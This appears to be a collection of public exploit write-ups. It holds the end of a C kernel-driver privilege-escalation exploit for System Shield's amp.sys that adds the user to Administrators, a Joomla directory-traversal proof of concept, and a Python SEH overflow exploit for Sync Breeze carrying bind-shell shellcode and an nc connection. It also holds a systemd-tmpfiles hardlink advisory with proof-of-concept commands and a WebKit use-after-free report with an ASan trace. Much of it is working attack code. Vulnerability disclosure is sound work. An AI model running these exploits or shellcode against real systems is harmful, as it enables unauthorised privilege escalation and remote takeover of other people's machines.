if (!CreateProcess(NULL, "c:\\windows\\system32\\msiexec.exe /i poc.msi /quiet", NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi))
{
printf("\n[-] CreateProcess failed %d", GetLastError());
ExitProcess(1);
}
printf("\n[+] c:\\windows\\system32\\msiexec.exe launched");
printf("\n[i] Account should now be in the local administrators group");
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
return 0;
}
int main(int argc, char *argv[])
{
QWORD TokenAddressTarget;
QWORD SepPrivilegesOffset = 0x40;
QWORD TokenAddress;
HANDLE hDevice;
char devhandle[MAX_PATH];
DWORD dwRetBytes = 0;
QWORD inbuffer1[3] = {0};
QWORD inbuffer2[3] = {0};
QWORD ptrbuffer[1] = {0}; // QWORD4 - Has to be 0 for arbitrary write value to be 0xfffffffe
DWORD currentusersize;
char currentuser[100];
char netcommand[MAX_PATH];
printf("-------------------------------------------------------------------------------\n");
printf(" System Shield AntiVirus & AntiSpyware (amp.sys) Arbitrary Write EoP Exploit \n");
printf(" Tested on 64bit Windows 7 / Windows 10 (1709) \n");
printf("-------------------------------------------------------------------------------\n");
TokenAddress = TokenAddressCurrentProcess(GetCurrentProcess(), GetCurrentProcessId());
printf("\n[i] Address of current process token 0x%p", TokenAddress);
TokenAddressTarget = TokenAddress + SepPrivilegesOffset;
printf("\n[i] Address of _SEP_TOKEN_PRIVILEGES 0x%p will be overwritten", TokenAddressTarget);
inbuffer1[0] = 0x8; // QWORD1 - Cannot be more than 8. Also different values (<9) calculates to different sub calls
inbuffer1[1] = ptrbuffer; // QWORD2 - Address used for read and write
inbuffer1[2] = TokenAddressTarget+1; // QWORD3 - Arbitrary write address !!!
inbuffer2[0] = 0x8;
inbuffer2[1] = ptrbuffer;
inbuffer2[2] = TokenAddressTarget+9;
sprintf(devhandle, "\\\\.\\%s", "amp");
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
{
printf("\n[-] Open %s device failed\n\n", devhandle);
return -1;
}
else
{
printf("\n[+] Open %s device successful", devhandle);
}
printf("\n[~] Press any key to continue . . .\n");
getch();
DeviceIoControl(hDevice, 0x00226003, inbuffer1, sizeof(inbuffer1), NULL, 0, &dwRetBytes, NULL);
DeviceIoControl(hDevice, 0x00226003, inbuffer2, sizeof(inbuffer2), NULL, 0, &dwRetBytes, NULL);
printf("[+] Overwritten _SEP_TOKEN_PRIVILEGES bits\n");
CloseHandle(hDevice);
currentusersize = sizeof(currentuser);
if (!GetUserName(currentuser, ¤tusersize))
{
printf("\n[-] Failed to obtain current username: %d\n\n", GetLastError());
return -1;
}
printf("[*] Adding current user '%s' account to the local administrators group", currentuser);
sprintf(netcommand, "net localgroup Administrators %s /add", currentuser);
TakeOwnership();
WriteToRegistry(netcommand);
TriggerCommand();
Sleep(1000);
RestorePermissions();
printf("\n\n");
return 0;
}
# # # # #
# Exploit Title: Joomla! Component Picture Calendar for Joomla 3.1.4 - Directory Traversal
# Dork: N/A
# Date: 30.01.2018
# Vendor Homepage: http://www.joomlacalendars.com/
# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/picture-calendar-for-joomla/
# Version: 3.1.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6397
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# Directory Traversal...
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/list.php?folder=[DIRECTORY]
#
# # # # #
# Exploit Title: Sync Breeze Enterprise v10.4.18 Server - Unauthenticated Remote Buffer Overflow SEH
# Date: 29/01/2018
# Exploit Author: Daniel Teixeira
# Vendor Homepage: http://www.syncbreeze.com
# Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.4.18.exe
# Version: 10.4.18
# Tested on: Windows 7 x86
from struct import pack
from os import system
from sys import exit
from time import sleep
import socket
port = 9121
host = "172.16.40.148"
# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -f py -b '\x00\x02\x0a\x0d\xf8\xfd' --var-name shellcode
shellcode = ""
shellcode += "\xba\x71\x6d\xbf\xc8\xd9\xc0\xd9\x74\x24\xf4\x5d"
shellcode += "\x29\xc9\xb1\x53\x83\xed\xfc\x31\x55\x0e\x03\x24"
shellcode += "\x63\x5d\x3d\x3a\x93\x23\xbe\xc2\x64\x44\x36\x27"
shellcode += "\x55\x44\x2c\x2c\xc6\x74\x26\x60\xeb\xff\x6a\x90"
shellcode += "\x78\x8d\xa2\x97\xc9\x38\x95\x96\xca\x11\xe5\xb9"
shellcode += "\x48\x68\x3a\x19\x70\xa3\x4f\x58\xb5\xde\xa2\x08"
shellcode += "\x6e\x94\x11\xbc\x1b\xe0\xa9\x37\x57\xe4\xa9\xa4"
shellcode += "\x20\x07\x9b\x7b\x3a\x5e\x3b\x7a\xef\xea\x72\x64"
shellcode += "\xec\xd7\xcd\x1f\xc6\xac\xcf\xc9\x16\x4c\x63\x34"
shellcode += "\x97\xbf\x7d\x71\x10\x20\x08\x8b\x62\xdd\x0b\x48"
shellcode += "\x18\x39\x99\x4a\xba\xca\x39\xb6\x3a\x1e\xdf\x3d"
shellcode += "\x30\xeb\xab\x19\x55\xea\x78\x12\x61\x67\x7f\xf4"
shellcode += "\xe3\x33\xa4\xd0\xa8\xe0\xc5\x41\x15\x46\xf9\x91"
shellcode += "\xf6\x37\x5f\xda\x1b\x23\xd2\x81\x73\x80\xdf\x39"
shellcode += "\x84\x8e\x68\x4a\xb6\x11\xc3\xc4\xfa\xda\xcd\x13"
shellcode += "\xfc\xf0\xaa\x8b\x03\xfb\xca\x82\xc7\xaf\x9a\xbc"
shellcode += "\xee\xcf\x70\x3c\x0e\x1a\xec\x34\xa9\xf5\x13\xb9"
shellcode += "\x09\xa6\x93\x11\xe2\xac\x1b\x4e\x12\xcf\xf1\xe7"
shellcode += "\xbb\x32\xfa\x16\x60\xba\x1c\x72\x88\xea\xb7\xea"
shellcode += "\x6a\xc9\x0f\x8d\x95\x3b\x38\x39\xdd\x2d\xff\x46"
shellcode += "\xde\x7b\x57\xd0\x55\x68\x63\xc1\x69\xa5\xc3\x96"
shellcode += "\xfe\x33\x82\xd5\x9f\x44\x8f\x8d\x3c\xd6\x54\x4d"
shellcode += "\x4a\xcb\xc2\x1a\x1b\x3d\x1b\xce\xb1\x64\xb5\xec"
shellcode += "\x4b\xf0\xfe\xb4\x97\xc1\x01\x35\x55\x7d\x26\x25"
shellcode += "\xa3\x7e\x62\x11\x7b\x29\x3c\xcf\x3d\x83\x8e\xb9"
shellcode += "\x97\x78\x59\x2d\x61\xb3\x5a\x2b\x6e\x9e\x2c\xd3"
shellcode += "\xdf\x77\x69\xec\xd0\x1f\x7d\x95\x0c\x80\x82\x4c"
shellcode += "\x95\xb0\xc8\xcc\xbc\x58\x95\x85\xfc\x04\x26\x70"
shellcode += "\xc2\x30\xa5\x70\xbb\xc6\xb5\xf1\xbe\x83\x71\xea"
shellcode += "\xb2\x9c\x17\x0c\x60\x9c\x3d"
payload = "A" * 124 # offset
payload += "\x90\x09\xeb\x05" # jmp over seh retrun value
payload += "\x1b\x5c\x01\x10" # 0x10015c1b : pop edi # pop esi # ret 0x04 | ascii {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Sync Breeze Enterprise\bin\libspp.dll)
payload += "\x90" * 10
payload += "\x83\xc4\x64" * 20 # metasm > add esp,100
payload += "\xff\xe4" # metasm > jmp esp
payload += "\x90" * (1000 - len(payload) - len(shellcode))
payload += shellcode
header = "\x75\x19\xba\xab"
header += "\x03\x00\x00\x00"
header += "\x00\x40\x00\x00"
header += pack('<I', len(payload))
header += pack('<I', len(payload))
header += pack('<I', ord(payload[-1]))
packet = header
packet += payload
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print "[*] Testing connection to target %s:%s" %(host,port)
s.connect((host, port))
except:
print "[-] Unable to communicate to target %s:%s" %(host,port)
exit()
s.send(packet)
print "[*] Payload Sent.."
print "[*] Connecting to bind shell %s:4444 .." %host
sleep(5)
system("nc %s 4444"%host)
Product: systemd (systemd-tmpfiles)
Versions-affected: 236 and earlier
Author: Michael Orlitzky
Fixed-in: commit 5579f85 , version 237
Bug-report: https://github.com/systemd/systemd/issues/7736
Acknowledgments: Lennart Poettering who, instead of calling me an idiot
for not realizing that systemd enables fs.protected_hardlinks by
default, went out of his way to harden the non-default configuration.
== Summary ==
Before version 237, the systemd-tmpfiles program will change the
permissions and ownership of hard links. If the administrator disables
the fs.protected_hardlinks sysctl, then an attacker can create hard
links to sensitive files and subvert systemd-tmpfiles, particularly
with "Z" type entries.
Systemd as PID 1 with the default fs.protected_hardlinks=1 is safe.
== Details ==
When running as PID 1, systemd enables the fs.protected_hardlinks
sysctl by default; that prevents an attacker from creating hard links
to files that he can't write to. If, however, the administrator should
decide to disable that sysctl, then hard links may be created to any
file (on the same filesystem).
Before version 237, the systemd-tmpfiles program will voluntarily
change the permissions and ownership of a hard link, and that is
exploitable in a few scenarios. The most problematic and easiest to
exploit is the "Z" type tmpfiles.d entry, which changes ownership and
permissions recursively. For an example, consider the following
tmpfiles.d entries,
d /var/lib/systemd-exploit-recursive 0755 mjo mjo
Z /var/lib/systemd-exploit-recursive 0755 mjo mjo
Whenever systemd-tmpfiles is run, those entries make mjo the owner of
everything under and including /var/lib/systemd-exploit-recursive. After
the first run, mjo can create a hard link inside that directory pointing
to /etc/passwd. The next run (after a reboot, for example) changes the
ownership of /etc/passwd.
A proof-of-concept can be run from the systemd source tree, using
either two separate terminals or sudo:
root # sysctl -w fs.protected_hardlinks=0
root # sysctl -w kernel.grsecurity.linking_restrictions=0
root # ./build/systemd-tmpfiles --create
mjo $ ln /etc/passwd /var/lib/systemd-exploit-recursive/x
root # ./build/systemd-tmpfiles --create
mjo $ /bin/ls -l /etc/passwd
-rwxr-xr-x 2 mjo mjo 1504 Dec 20 14:27 /etc/passwd
More elaborate exploits are possible, and not only the "Z" type is
vulnerable.
== Resolution ==
The recursive change of ownership/permissions does not seem to be safely
doable without fs.protected_hardlinks enabled.
In version 237 and later, systemd-tmpfiles calls fstatat() immediately
after obtaining a file descriptor from open():
fd = open(path, O_NOFOLLOW|O_CLOEXEC|O_PATH);
if (fd < 0) {
...
}
if (fstatat(fd, "", &st, AT_EMPTY_PATH) < 0)
The st->st_nlink field is then checked to determine whether or not fd
describes a hard link. If it does, the ownership/permissions are not
changed, and an error is displayed:
if (hardlink_vulnerable(&st)) {
log_error("Refusing to set permissions on hardlink...", path);
return -EPERM;
}
There is still a tiny window between open() and fstatat() where the
attacker can fool this countermeasure by removing an existing hard
link to, say, /etc/passwd. In that case, st->st_nlink will be 1, but
fd still references /etc/passwd. The attack succeeds, but is much
harder to do, and the window is as narrow as possible. More to the
point, it seems unavoidable when implementing the tmpfiles.d
specification.
== Mitigation ==
Leave the fs.protected_hardlinks sysctl enabled.
<!--
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of Revision 225572 on OSX.
The PoC is attached.
Preliminary Analysis:
SVGPropertyTearOff keeps a pointer to a SVG property in m_value. When detachWrapper() is called, that pointer gets dereferenced and the value copied. This comment explains when/why this is used
https://github.com/WebKit/webkit/blob/5277f6fb92b0c03958265d24a7692142f7bdeaf8/Source/WebCore/svg/properties/SVGPropertyTearOff.h#L105
SVGPropertyTearOff keeps track of just a single value. In case the SVG property is actually a list of values, the values are stored in a Vector and SVGPropertyTearOff will keep a pointer to somewhere inside the vector's buffer. If a vector gets resized before detachWrapper() is called and the vector's buffer gets realloc()'ed, SVGPropertyTearOff's m_value will point to freed memory.
ASan log:
=================================================================
==50494==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0000dccc0 at pc 0x0001262c1ba0 bp 0x7ffeee3a0460 sp 0x7ffeee3a0458
READ of size 8 at 0x60c0000dccc0 thread T0
==50494==WARNING: invalid path to external symbolizer!
==50494==WARNING: Failed to use and restart external symbolizer!
#0 0x1262c1b9f in WebCore::SVGPropertyTearOff<WebCore::SVGLengthValue>::detachWrapper() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xfe2b9f)
#1 0x1263e58ba in WebCore::SVGListProperty<WebCore::SVGLengthListValues>::detachListWrappersAndResize(WTF::Vector<WebCore::SVGLength*, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>*, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11068ba)
#2 0x12899fc77 in void WebCore::SVGAnimatedTypeAnimator::executeAction<WebCore::SVGAnimatedListPropertyTearOff<WebCore::SVGLengthListValues> >(WebCore::SVGAnimatedTypeAnimator::AnimationAction, WTF::Vector<WebCore::SVGElementAnimatedProperties, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc> const&, unsigned int, WebCore::SVGAnimatedListPropertyTearOff<WebCore::SVGLengthListValues>::ContentType*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36c0c77)
#3 0x128985a0e in WebCore::SVGAnimateElementBase::resetAnimatedType() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36a6a0e)
#4 0x128afacc2 in WebCore::SVGSMILElement::progress(WebCore::SMILTime, WebCore::SVGSMILElement*, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x381bcc2)
#5 0x128af82c1 in WebCore::SMILTimeContainer::updateAnimations(WebCore::SMILTime, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x38192c1)
#6 0x128af6b5c in WebCore::SMILTimeContainer::timerFired() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3817b5c)
#7 0x127f21112 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2c42112)
#8 0x127fc6009 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ce7009)
#9 0x7fff3e602bb3 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8ebb3)
#10 0x7fff3e602826 in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e826)
#11 0x7fff3e602329 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e329)
#12 0x7fff3e5f992a in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8592a)
#13 0x7fff3e5f8d22 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x84d22)
#14 0x7fff3d910e25 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fe25)
#15 0x7fff3d910b95 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb95)
#16 0x7fff3d910913 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f913)
#17 0x7fff3bbdbf5e in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41f5e)
#18 0x7fff3c371b4b in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7b4b)
#19 0x7fff3bbd0d6c in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36d6c)
#20 0x7fff3bb9ff19 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5f19)
#21 0x7fff6611a42e in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x1042e)
#22 0x7fff66119081 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf081)
#23 0x10185d4d6 in main (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x1000014d6)
#24 0x7fff65e4d114 in start (/usr/lib/system/libdyld.dylib:x86_64+0x1114)
0x60c0000dccc0 is located 0 bytes inside of 128-byte region [0x60c0000dccc0,0x60c0000dcd40)
freed by thread T0 here:
#0 0x1239d4fa4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59fa4)
#1 0x1358554b0 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1fcb4b0)
#2 0x1263e6350 in WTF::Vector<WebCore::SVGLengthValue, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>::shrinkCapacity(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1107350)
#3 0x126972f81 in WTF::Vector<WebCore::SVGLengthValue, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>::operator=(WTF::Vector<WebCore::SVGLengthValue, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc> const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1693f81)
#4 0x1289a03cd in WebCore::SVGLengthListValues::operator=(WebCore::SVGLengthListValues const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36c13cd)
#5 0x12899806d in void WebCore::SVGAnimatedTypeAnimator::resetFromBaseValue<WebCore::SVGAnimatedListPropertyTearOff<WebCore::SVGLengthListValues> >(WTF::Vector<WebCore::SVGElementAnimatedProperties, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc> const&, WebCore::SVGAnimatedType&, WebCore::SVGAnimatedListPropertyTearOff<WebCore::SVGLengthListValues>::ContentType& (WebCore::SVGAnimatedType::*)()) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36b906d)
#6 0x1289859d8 in WebCore::SVGAnimateElementBase::resetAnimatedType() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36a69d8)
#7 0x128afacc2 in WebCore::SVGSMILElement::progress(WebCore::SMILTime, WebCore::SVGSMILElement*, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x381bcc2)
#8 0x128af82c1 in WebCore::SMILTimeContainer::updateAnimations(WebCore::SMILTime, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x38192c1)
#9 0x128af6b5c in WebCore::SMILTimeContainer::timerFired() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3817b5c)
#10 0x127f21112 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2c42112)
#11 0x127fc6009 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ce7009)
#12 0x7fff3e602bb3 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8ebb3)
#13 0x7fff3e602826 in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e826)
#14 0x7fff3e602329 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e329)
#15 0x7fff3e5f992a in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8592a)
#16 0x7fff3e5f8d22 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x84d22)
#17 0x7fff3d910e25 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fe25)
#18 0x7fff3d910b95 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb95)
#19 0x7fff3d910913 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f913)
#20 0x7fff3bbdbf5e in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41f5e)
#21 0x7fff3c371b4b in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7b4b)
#22 0x7fff3bbd0d6c in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36d6c)
#23 0x7fff3bb9ff19 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5f19)
#24 0x7fff6611a42e in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x1042e)
#25 0x7fff66119081 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf081)
#26 0x10185d4d6 in main (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x1000014d6)
#27 0x7fff65e4d114 in start (/usr/lib/system/libdyld.dylib:x86_64+0x1114)
previously allocated by thread T0 here:
#0 0x1239d4a3c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59a3c)
#1 0x7fff65ff5200 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2200)
#2 0x135855944 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1fcb944)
#3 0x135853bdd in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1fc9bdd)
#4 0x1357c045b in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1f3645b)
#5 0x1357bf90a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1f3590a)
#6 0x1252e5ed8 in WTF::FastMalloc::malloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6ed8)
#7 0x1263e65f0 in WTF::VectorBufferBase<WebCore::SVGLengthValue, WTF::FastMalloc>::allocateBuffer(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11075f0)
#8 0x126973640 in WTF::Vector<WebCore::SVGLengthValue, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>::Vector(WTF::Vector<WebCore::SVGLengthValue, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc> const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1694640)
#9 0x128998d47 in bool WebCore::SVGAnimationElement::adjustFromToListValues<WebCore::SVGLengthListValues>(WebCore::SVGLengthListValues const&, WebCore::SVGLengthListValues const&, WebCore::SVGLengthListValues&, float, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36b9d47)
#10 0x1289985bf in WebCore::SVGAnimatedLengthListAnimator::calculateAnimatedValue(float, unsigned int, WebCore::SVGAnimatedType*, WebCore::SVGAnimatedType*, WebCore::SVGAnimatedType*, WebCore::SVGAnimatedType*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36b95bf)
#11 0x128984d78 in WebCore::SVGAnimateElementBase::calculateAnimatedValue(float, unsigned int, WebCore::SVGSMILElement*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36a5d78)
#12 0x1289ae9cb in WebCore::SVGAnimationElement::updateAnimation(float, unsigned int, WebCore::SVGSMILElement*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36cf9cb)
#13 0x128afad65 in WebCore::SVGSMILElement::progress(WebCore::SMILTime, WebCore::SVGSMILElement*, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x381bd65)
#14 0x128af82c1 in WebCore::SMILTimeContainer::updateAnimations(WebCore::SMILTime, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x38192c1)
#15 0x128af6b5c in WebCore::SMILTimeContainer::timerFired() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3817b5c)
#16 0x127f21112 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2c42112)
#17 0x127fc6009 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ce7009)
#18 0x7fff3e602bb3 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8ebb3)
#19 0x7fff3e602826 in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e826)
#20 0x7fff3e602329 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e329)
#21 0x7fff3e5f992a in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8592a)
#22 0x7fff3e5f8d22 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x84d22)
#23 0x7fff3d910e25 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fe25)
#24 0x7fff3d910b95 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb95)
#25 0x7fff3d910913 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f913)
#26 0x7fff3bbdbf5e in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41f5e)
#27 0x7fff3c371b4b in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7b4b)
#28 0x7fff3bbd0d6c in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36d6c)
#29 0x7fff3bb9ff19 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5f19)
